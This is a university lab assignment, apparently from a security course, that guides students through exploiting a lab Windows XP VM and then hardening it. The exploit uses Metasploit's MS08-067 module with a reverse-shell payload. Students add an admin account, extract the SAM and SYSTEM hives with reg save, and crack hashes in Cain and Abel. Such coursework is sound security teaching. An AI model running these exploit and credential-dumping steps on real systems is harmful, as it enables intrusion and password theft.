Scribd
Upload
21 views

SEC220_Assignment 2 (1)

This assignment focuses on cracking Windows XP passwords and hardening the system using penetration tools like Metasploit and Cain and Abel. Students will work in groups to gather information about Windows XP, exploit vulnerabilities, create accounts, and ultimately implement security measures. The assignment requires detailed documentation of processes, including screenshots and explanations of commands used.

Uploaded by

nisadakash26
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
21 views

SEC220_Assignment 2 (1)

This assignment focuses on cracking Windows XP passwords and hardening the system using penetration tools like Metasploit and Cain and Abel. Students will work in groups to gather information about Windows XP, exploit vulnerabilities, create accounts, and ultimately implement security measures. The assignment requires detailed documentation of processes, including screenshots and explanations of commands used.

Uploaded by

nisadakash26
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

SEC220 Assignment 2

Cracking Windows Password and Hardening


(100 Marks, 15%)
Overview:
Operating Systems keep The passwords as Hash codes. Some applications like Cain and Abel
can crack the passwords as long as the program finds the hash codes. In this assignment, we use
penetration tools to break into Windows XP in our labs.
Knowledge gained in the assignment and through this course will not be practiced outside the
Lab without explicit and proper authorization if the use of such knowledge is in violation of
College polices or applicable provincial/federal laws and regulations.
Answers to the questions must be in your words. Don't copy from other sources.
Objective:
This assignment is a Group assignment. Work on the assignment together, and only one member
of the group must submit the report (don't submit it separately). You need to use your Kali
Linux, Windows 10, and Windows XP. You don't have any information about Windows XP. We
try to gather information from Windows XP and attack it via Metasploit using Kali Linux tools.
By creating an account and setting it as an administrator's member, you can login to Windows
XP with your account. You don't want to change any account's password, so you want to crack
the passwords. Transfer Sam and System files to your Windows 10 and use Cain and Abel to
crack the passwords.

The Lab Activities


Part 1: Download Windows XP (ZIP file)
1. Click on the link provided in the assignment and download the Windows XP
2. Decompress the file in your VMs folder
3. Open your VMWare Click on Open Virtual Machine and load Windows XP

Part 2: Investigate the Windows XP and Load Windows shell revers


You don't have any access to Windows XP. You must find out what kind of service pack it
has. What is its IP address of it?
1. Use the Nmap command and find out about the Windows XP IP address. (Hint:
search as Ping)
SEC220 Assignment 2
2. Use Nmap command as intensive to find information about Windows XP. (Hint:
search for Operating System as single host)
3. Take a screenshot of the Windows information (10 Marks)

Now you have all information you need to attack the Win XP. Load Metasploit on your Kali
Linux. You need to find some information about Metasploit and how to attack Win XP.

1. Search Metasploit for ms08_067


Use the search command to search for if any module is available in Metasploit for
vulnerability in focus which is ms08–067. Type the following command:

search ms08_067

2. Find more information about the module


Now in order to gather detailed information about the available Metasploit module for the
ms08–067 vulnerability, we will enter the following command in the kali terminal

Info exploit/windows/smb/ms08_067_netapi

3. Change to ms08_067 directory


Once we confirm the specific Metasploit module (exploit), we can execute the command
below to use the specific exploit available for ms08_067 vulnerability.

use exploit/windows/smb/ms08_067_netapi

4. Setting up the Module Options


Once you have chosen a specific exploit, enter the following command to list all options
available for this exploit module.

show options

5. Setting RHOST to Target Windows XP VM IP Address

set RHOST [IP Address of Windows XP VM]

6. Selecting and using any of the Compatible Payloads for this Exploit module
Now we can set the payload, let's say windowsàshell_reverse_tcp, by using the command
below

set payload windows/shell_reverse_tcp

Q1- Why did you use payload? And why did you use shell_reverse_tcp? (5 Marks)

7. Setting up Local Host, Kali Linux


Find Kali Linux IP address. Now, we need to set the value for LHOST option to Kali Linux
by using the command mentioned below:

set LHOST [Kali Linux IP Address]


SEC220 Assignment 2

Enter the following command to view the set options.

show options
(Take a screenshot) (10 Marks)

8. Exploiting the Target with Metasploit


Now enter the exploit command in Metasploit. You should see the Windows XP command
prompt in the following pictures:

Part 3: Create an account with administrator privilege in the Windows XP


We don't have any access to Windows XP. By using Metasploit, you have access to Win XP
now. We need to create an account and add this account as a member of the administrators'
group. Use Windows "net" command to add this account. (search for the command and find
how to use it) (Take a screenshot) (10 Marks)
Now, you have a username and password to login to Windows XP.

Q2- How can you use the net command to show all local groups in Win XP? (5 Marks)

Part 4: Crack the student account's password


You have full access to Windows XP with your new account. You must find out about the
"student" account's password. DON'T CHANGE THE "student" ACCOUNT'S
PASSWORD.
Find out what kind of password settings Windows XP has, how many characters, type of
password characters. You can check Local Security Policy.
After finding the above information, start cracj\king the "Student" account's password. Windows
keeps passwords as NTLM Hash in the sam file. The system file privileges are required to view
passwords. Now you need to copy these two files to VM Windows 10. However, you can't copy
these files from the directory C:\Windows\System32\config. To copy these files, you need to use
the reg command to copy them from the Windows registry to the files.
 Use this command as follow:

reg save HKLM\sam c:\sam


reg save HKLM\system c:\system

Q3- What is HKLM, and why does Windows use it? (5 marks)

You need to transfer these files to your Windows 10 VM. You can:
SEC220 Assignment 2
 copy/paste them from XP to Windows 10 VM
OR
copy/paste them to your host OS (Windows or Mac) from XP, then copy/paste to
Windows 10 VM.
Now you need to insert all XP accounts to Cain and Abel program to crack the student account's
password. Follow the instructions to do it:
 Run Cain application
 Click on the Cracker tab
 Right-click on the cracker window and select Add to list from the menu (Or press Insert
key)
 Select "Import Hashes from a SAM database."
 Load transferred sam file to this window
 Load transferred system to the Boot Key (HEX) box, and it will provide a Hex code.
Copy and paste this code into the Boot Key (HEX) text box.

 Click on next and see all Win XP accounts with their hashes.
 Use Bruteforce attack and the following Win XP password policy to crack the Student's
Password.
o You need to check the Local Security Policy to find out the Win XP password
settings. (Control Panel, Administrative Tools, Local Security Policy)
o If you set the Bruteforce settings properly, your password cracking will take 5 to
12 minutes.
o If it takes more than 12 minutes, recheck your settings.
o Take a screenshot of the result. (10 marks)

Now login to windows XP with the "student" account and do as follow to prove your work:
SEC220 Assignment 2
 Use CMD or Paint to write your names on it.
 Don't change the background.
 Take a screenshot (10 marks)

Part 5:
Now you found the vulnerability of Windows XP. In this part, you will harden Windows XP. For
hardening, do the following steps:
1- Install Service Packs 1 and 3 to protect some vulnerabilities of Windows XP. (the service
packs are already provided in Student's account Desktop, don't download them). Take a
screenshot from System Properties. (5 marks)

2- Use a Windows firewall to block the port number that "Metasploit" used this port to
attack Windows XP. You must find the service that uses this port number (check
provided services). In windows firewall, you can find the service and disable it. Take a
screenshot that the Metasploit can't exploit, and Nmap shows the port has been closed.
(10 marks)
SEC220 Assignment 2

3- Hardening Windows XP by changing some password settings. In Local Security Policy


(Control Panel, Administrator Tools), change password settings to strengthen the
password.
a. Length of password 8 characters
b. Password History: 3 Passwords
c. Maximum password age: 45 days
d. Account lockout after 3 invalid passwords

Take a screenshot of your password settings. (10 marks)

Lab Report Write-up


Submit your lab results using the template provided for lab 0. Don't use this document for your report.
Deliverable
Submit your lab report, including answers and screenshots, to Blackboard under the appropriate week.

Note:
Late Assignments still need to be satisfactorily completed and submitted by the end of the semester
to meet SEC220’s Promotion Requirements.

You might also like